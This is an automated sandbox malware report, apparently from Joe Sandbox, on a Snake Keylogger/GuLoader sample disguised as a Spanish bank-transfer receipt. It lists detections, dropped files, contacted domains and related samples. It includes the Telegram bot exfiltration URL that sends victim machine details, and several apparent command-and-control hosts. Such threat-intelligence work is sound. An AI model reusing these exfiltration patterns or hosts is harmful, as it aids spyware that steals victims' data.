justificante de transferencia09454545.exe	74%	Virustotal		Browse
justificante de transferencia09454545.exe	67%	ReversingLabs	Win32.Spyware.Snakekeylogger
justificante de transferencia09454545.exe	100%	Avira	DR/AVI.Agent.eoaaj

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\klovsyges\Affinitatively\justificante de transferencia09454545.exe	100%	Avira	DR/AVI.Agent.eoaaj
C:\Users\user\AppData\Local\Temp\nstE995.tmp\nsExec.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\klovsyges\Affinitatively\justificante de transferencia09454545.exe	67%	ReversingLabs	Win32.Spyware.Snakekeylogger

Source	Detection	Scanner	Label
http://crl.microsoftEW	0%	Avira URL Cloud	safe
https://go.miB	0%	Avira URL Cloud	safe
https://go.miBitLocker.psd1am.	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	216.58.212.142	true	false	high
drive.usercontent.google.com	142.250.185.65	true	false	high
reallyfreegeoip.org	104.21.112.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2014/03/2025%20/%2010:37:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/ac/?q=	msiexec.exe, 0000000B.00000002.2204924421.0000000022341000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	msiexec.exe, 0000000B.00000002.2203518300.0000000021366000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	msiexec.exe, 0000000B.00000002.2203518300.0000000021366000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20a	msiexec.exe, 0000000B.00000002.2203518300.0000000021366000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/Bg	msiexec.exe, 0000000B.00000002.2190551955.000000000563A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000001.00000002.1318798698.0000000006209000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/lB	msiexec.exe, 0000000B.00000002.2203518300.000000002143F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	msiexec.exe, 0000000B.00000002.2204924421.0000000022597000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2204924421.0000000022341000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	msiexec.exe, 0000000B.00000002.2203518300.0000000021413000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2203518300.0000000021404000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	msiexec.exe, 0000000B.00000002.2203518300.0000000021281000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	msiexec.exe, 0000000B.00000003.1404332264.00000000056C0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1404332264.00000000056B2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	msiexec.exe, 0000000B.00000002.2204924421.0000000022597000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2204924421.0000000022341000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.1315720582.00000000051A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/	msiexec.exe, 0000000B.00000002.2190551955.000000000563A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	msiexec.exe, 0000000B.00000002.2204924421.0000000022597000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2204924421.0000000022341000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000001.00000002.1318798698.0000000006209000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.1318798698.0000000006209000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enlB	msiexec.exe, 0000000B.00000002.2203518300.000000002140E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	msiexec.exe, 0000000B.00000003.1404332264.00000000056C0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.1315720582.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2203518300.0000000021281000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.miB	powershell.exe, 00000001.00000002.1321322749.0000000007769000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	msiexec.exe, 0000000B.00000002.2203518300.00000000212CE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/	msiexec.exe, 0000000B.00000002.2203518300.0000000021444000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2203518300.0000000021435000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.1318798698.0000000006209000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000001.00000002.1315720582.00000000052F6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.1315720582.00000000052F6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000001.00000002.1315720582.00000000052F6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.1315720582.00000000052F6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoftEW	powershell.exe, 00000001.00000002.1321322749.0000000007817000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000001.00000002.1318798698.0000000006209000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	msiexec.exe, 0000000B.00000002.2204924421.0000000022341000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV21C:	svchost.exe, 00000004.00000003.1204954119.00000254754C0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	false		high
http://crl.ver)	svchost.exe, 00000004.00000002.2190147360.0000025475600000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	msiexec.exe, 0000000B.00000002.2204924421.0000000022341000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	msiexec.exe, 0000000B.00000002.2190551955.00000000056A5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	msiexec.exe, 0000000B.00000002.2203518300.0000000021281000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en4	msiexec.exe, 0000000B.00000002.2203518300.0000000021413000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	justificante de transferencia09454545.exe, justificante de transferencia09454545.exe.1.dr	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	msiexec.exe, 0000000B.00000002.2203518300.0000000021366000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en8	msiexec.exe, 0000000B.00000002.2203518300.0000000021404000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.1315720582.00000000052F6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.miBitLocker.psd1am.	powershell.exe, 00000001.00000002.1321322749.0000000007769000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aborters.duckdns.org:8081	msiexec.exe, 0000000B.00000002.2203518300.0000000021281000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/8	msiexec.exe, 0000000B.00000002.2203518300.0000000021435000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.m	powershell.exe, 00000001.00000002.1321322749.00000000077BB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod1C:	edb.log.4.dr	false		high
https://www.ecosia.org/newtab/v20	msiexec.exe, 0000000B.00000002.2204924421.0000000022597000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2204924421.0000000022341000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error	justificante de transferencia09454545.exe, justificante de transferencia09454545.exe.1.dr	false		high
https://www.office.com/4	msiexec.exe, 0000000B.00000002.2203518300.0000000021444000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	msiexec.exe, 0000000B.00000002.2203518300.0000000021281000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtabv20	msiexec.exe, 0000000B.00000002.2204924421.0000000022597000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2204924421.0000000022341000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000001.00000002.1315720582.00000000052F6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	msiexec.exe, 0000000B.00000002.2203518300.0000000021366000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2203518300.00000000212F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2203518300.000000002133E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	msiexec.exe, 0000000B.00000002.2203518300.00000000212CE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2203518300.0000000021366000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2203518300.000000002133E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	msiexec.exe, 0000000B.00000002.2204924421.0000000022341000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	msiexec.exe, 0000000B.00000002.2204924421.0000000022341000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.112.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
216.58.212.142	drive.google.com	United States	15169	GOOGLEUS	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
142.250.185.65	drive.usercontent.google.com	United States	15169	GOOGLEUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1637019
Start date and time:	2025-03-13 10:05:37 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	justificante de transferencia09454545.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/25@6/6
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 96% Number of executed functions: 138 Number of non-executed functions: 51
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.60.203.209, 4.245.163.56
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 5272 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6404 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:06:39	API Interceptor	40x Sleep call for process: powershell.exe modified
05:07:03	API Interceptor	2x Sleep call for process: svchost.exe modified
05:07:33	API Interceptor	13208x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	y79a2l1FY5.exe	Get hash	malicious	DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse
	https://ln.run/EYeFI#eWVjMDExNEBrb3JlYS5rcg==	Get hash	malicious	HTMLPhisher	Browse
	https://possibles-x.com/	Get hash	malicious	HTMLPhisher	Browse
	wekissingbestgirleveryseenwithmygirl.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger, VIP Keylogger	Browse
	mybestgirlfriendwalkingaroundtheworld.hta	Get hash	malicious	Cobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse
	cvf.exe	Get hash	malicious	Unknown	Browse
	cvf.exe	Get hash	malicious	Unknown	Browse
	Payment_Advise.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	4500149631.vbe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
104.21.112.1	CQDNwLUdY4.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/2dxw/
	sY8Sfsplzf.exe	Get hash	malicious	FormBook	Browse	www.enoughmoney.online/z9gb/?TF-P7=zR3cIyonFbUCfX4wpKNWKHtg5/zg1+YcnXRNJ+yYPjA6661hsBw23FkDfEgtp7rlWUxdaFu+U4x0i75BG7d41DR1Eot6cYC6DrNKmQYa+SmymwWTrA==&Pv5=thT0rvC
	gbdXRnNKkm.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/a669/
	JOB NO. AIQ8478.bat.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sccc/five/fre.php
	jzqc1V4NqB.exe	Get hash	malicious	FormBook	Browse	www.rbopisalive.cyou/a669/?WBuDj=rwARXV5iz9NY7lD2nse3mpYvX8mI8lq4kwoE5vm7VO31wBaqesAJuHozl9YZ6Ede+IkifZaE/LHkIUXetab9qlITGUdXxZLx5IMa8uxv5i9osOS22A==&Jzwht=FNiD
	CP07E1clp1.exe	Get hash	malicious	FormBook	Browse	www.fz977.xyz/406r/
	2Stejb80vJ.exe	Get hash	malicious	FormBook	Browse	www.askvtwv8.top/uztg/
	Shipment_Docus_COSCO_20250307_35405649_pdf.bat.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sccc/five/fre.php
	ORDER-000291-XLSX.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/tking3/five/fre.php
	Quotation_Order_Request_pdf.bat.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sccc/five/fre.php
158.101.44.242	QUOTATION_FEBQUOTE312025#U00faPDF.scr	Get hash	malicious	MSIL Logger	Browse	checkip.dyndns.org/
	category05 sc110-11#U3000_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	8QeI7CboDY.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	uhg.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	4500149631.vbe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	#rfq=O250116 - #U304a#U3088#U3073#U8cfc#U5165#U5951#U7d04- Offer Z01G-00008D SUPPLY - H64PO.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	niceworkingskillwithbestideasevermade.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	rDatosbancarios.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	pbgjw8i8N7.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	QUOTATION_FEBQUOTE312025#U00faPDF.scr	Get hash	malicious	MSIL Logger	Browse	158.101.44.242
	efs.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	193.122.130.0
	Product Order Hirsch 1475.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	category05 sc110-11#U3000_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	8QeI7CboDY.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	158.101.44.242
	y79a2l1FY5.exe	Get hash	malicious	DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	wekissingbestgirleveryseenwithmygirl.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	mybestgirlfriendwalkingaroundtheworld.hta	Get hash	malicious	Cobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	wecreatebestthingsentirelifeforgivenyou.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	132.226.247.73
reallyfreegeoip.org	QUOTATION_FEBQUOTE312025#U00faPDF.scr	Get hash	malicious	MSIL Logger	Browse	104.21.64.1
	efs.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	104.21.48.1
	Product Order Hirsch 1475.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	8QeI7CboDY.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.80.1
	y79a2l1FY5.exe	Get hash	malicious	DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	104.21.48.1
	wekissingbestgirleveryseenwithmygirl.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	mybestgirlfriendwalkingaroundtheworld.hta	Get hash	malicious	Cobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	wecreatebestthingsentirelifeforgivenyou.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	104.21.64.1
	uhg.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	104.21.80.1
api.telegram.org	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	y79a2l1FY5.exe	Get hash	malicious	DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	https://ln.run/EYeFI#eWVjMDExNEBrb3JlYS5rcg==	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://possibles-x.com/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	wekissingbestgirleveryseenwithmygirl.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	mybestgirlfriendwalkingaroundtheworld.hta	Get hash	malicious	Cobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	cvf.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	cvf.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Payment_Advise.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	4500149631.vbe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	y79a2l1FY5.exe	Get hash	malicious	DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	https://ln.run/EYeFI#eWVjMDExNEBrb3JlYS5rcg==	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://possibles-x.com/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	wekissingbestgirleveryseenwithmygirl.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	mybestgirlfriendwalkingaroundtheworld.hta	Get hash	malicious	Cobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Aura.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	cvf.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	cvf.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Payment_Advise.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
ORACLE-BMC-31898US	QUOTATION_FEBQUOTE312025#U00faPDF.scr	Get hash	malicious	MSIL Logger	Browse	158.101.44.242
	efs.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	193.122.130.0
	category05 sc110-11#U3000_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	8QeI7CboDY.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	158.101.44.242
	y79a2l1FY5.exe	Get hash	malicious	DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	miori.x86.elf	Get hash	malicious	Unknown	Browse	132.145.140.102
	wekissingbestgirleveryseenwithmygirl.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	mybestgirlfriendwalkingaroundtheworld.hta	Get hash	malicious	Cobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	uhg.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	158.101.44.242
CLOUDFLARENETUS	https://mr.ahmed-elgamal.com/03?id=0EcoCp6Ari	Get hash	malicious	HTMLPhisher	Browse	162.159.140.237
	https://mr.ahmed-elgamal.com/03/?id=0EcoCp6Ari	Get hash	malicious	HTMLPhisher	Browse	172.66.0.235
	http://trzrojjiwalet.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	172.64.151.8
	http://sg-adh7.vv.885210.xyz/	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://live--downld-ledger.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	172.64.153.55
	http://www.kuzveyutvts.site/p/ikametgah/giris.php	Get hash	malicious	Unknown	Browse	104.21.92.141
	https://t.co/6BJID9q49h	Get hash	malicious	HTMLPhisher	Browse	172.66.0.227
	http://imagoimpresiones.pe/Find/project	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://habora.co.uk/wp-admin/Ope/renew/	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://5df406a2-538b-4cca-a636-3dd2a7927dbc-00-2wmk9nmy6aapg.worf.replit.dev/	Get hash	malicious	Unknown	Browse	104.18.186.31

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	QUOTATION_FEBQUOTE312025#U00faPDF.scr	Get hash	malicious	MSIL Logger	Browse	104.21.112.1
	efs.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	Product Order Hirsch 1475.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	8QeI7CboDY.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	y79a2l1FY5.exe	Get hash	malicious	DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	wekissingbestgirleveryseenwithmygirl.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	mybestgirlfriendwalkingaroundtheworld.hta	Get hash	malicious	Cobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	wecreatebestthingsentirelifeforgivenyou.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	104.21.112.1
	uhg.hta	Get hash	malicious	Cobalt Strike, MSIL Logger, MassLogger RAT	Browse	104.21.112.1
3b5074b1b5d032e5620f69f9f700ff0e	Dhl.exe	Get hash	malicious	DarkTortilla	Browse	149.154.167.220
	SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Doc13032025.vbs	Get hash	malicious	Unknown	Browse	149.154.167.220
	y79a2l1FY5.exe	Get hash	malicious	DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	1.ps1	Get hash	malicious	RHADAMANTHYS	Browse	149.154.167.220
	Kiddion's Modest Menu v.1.0.0.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	149.154.167.220
	RQ-5218.msi	Get hash	malicious	AteraAgent	Browse	149.154.167.220
	wekissingbestgirleveryseenwithmygirl.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	mybestgirlfriendwalkingaroundtheworld.hta	Get hash	malicious	Cobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	mgoodnicepersonneedyourverywell.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	443_2003_https-df.exe	Get hash	malicious	Metasploit	Browse	216.58.212.142 142.250.185.65
	443_2003_https-df.exe	Get hash	malicious	Metasploit	Browse	216.58.212.142 142.250.185.65
	faktura_FV2025020637756.html	Get hash	malicious	Unknown	Browse	216.58.212.142 142.250.185.65
	SecuriteInfo.com.FileRepMalware.26489.28570.exe	Get hash	malicious	Unknown	Browse	216.58.212.142 142.250.185.65
	Bill Of Ladding & PL AWB No.1669134316.vbs	Get hash	malicious	GuLoader	Browse	216.58.212.142 142.250.185.65
	Payment_Advise.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	216.58.212.142 142.250.185.65
	FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	216.58.212.142 142.250.185.65
	4500149631.vbe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	216.58.212.142 142.250.185.65
	comprobante de pago.exe	Get hash	malicious	GuLoader	Browse	216.58.212.142 142.250.185.65

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nstE995.tmp\nsExec.dll	textless.exe	Get hash	malicious	FormBook, GuLoader	Browse
	URGENTE Ref.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	lkETeneRL3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Hornswoggle.exe	Get hash	malicious	GuLoader	Browse
